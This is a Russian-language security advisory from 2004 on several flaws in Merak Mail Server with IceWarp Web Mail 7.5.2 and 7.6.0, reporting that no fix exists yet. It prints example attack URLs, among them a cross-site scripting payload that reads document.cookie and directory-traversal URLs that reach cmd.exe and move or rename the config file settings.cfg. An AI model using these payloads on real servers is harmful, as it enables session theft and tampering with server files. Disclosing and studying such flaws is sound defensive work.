Дата публикации: | 09.11.2004 |
Всего просмотров: | 1488 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Merak Mail Server with IceWarp Web Mail 7.5.2, 7.6.0
Описание: Некоторые сценарии некорректно обрабатывают входные данные пользователей. Удаленный атакующий может создать специально сформированный URL и получить доступ к важным данным пользователей. Примеры:
http://[target]:32000/mail/send.html?id=[sessionid]&redirectfile="><script>alert(document.cookie)</script> Также сообщается, что удаленный авторизованный пользователь может из-за уязвимости в сценарии 'viewaction.html' создать и удалить произвольные директории на сервере. Пример: http://[target]:32000/mail/viewaction.html?id=[sessionid]&folder=../../../../../../../[arbitary directory]&Move_x=1&originalfolder=blabla http://[target]:32000/mail/viewaction.html?id=[sessionid]&messageid=...//...//...//...//…//…//…//winnt/system32/cmd.exe& Удаленный авторизованный атакующий может перемесить произвольные файлы на системе: http://[target]:32000/mail/viewaction.html?id=[session id]&messageid=...//...//...//...//config/settings.cfg&Move_x=1&originalfolder=blabla&m Удаленный авторизованный пользователь может переименовать произвольный файл на системе: http://[target]:32000/mail/folders.html?id=[sessionid]& folderold=blabla/...//...//...//...//config/settings.cfg&folder=blabla/...//...//...//...//cm Локальный пользователь может расшифровать пароли пользователей, которые хранятся в файлах users.cfg, settings.cfg (XOR), users.dat, and user.dat (Base64) Удаленный авторизованный пользователь может создать файл 'accounts.dat' с произвольным содержимым. URL производителя: www.icewarp.com Решение: Решение на данный момент не существует. |
|
Ссылки: | Merak Mail Server (with IceWarp Web Mail) Lets Remote Authenticated Users Move, Delete, and Rename Files |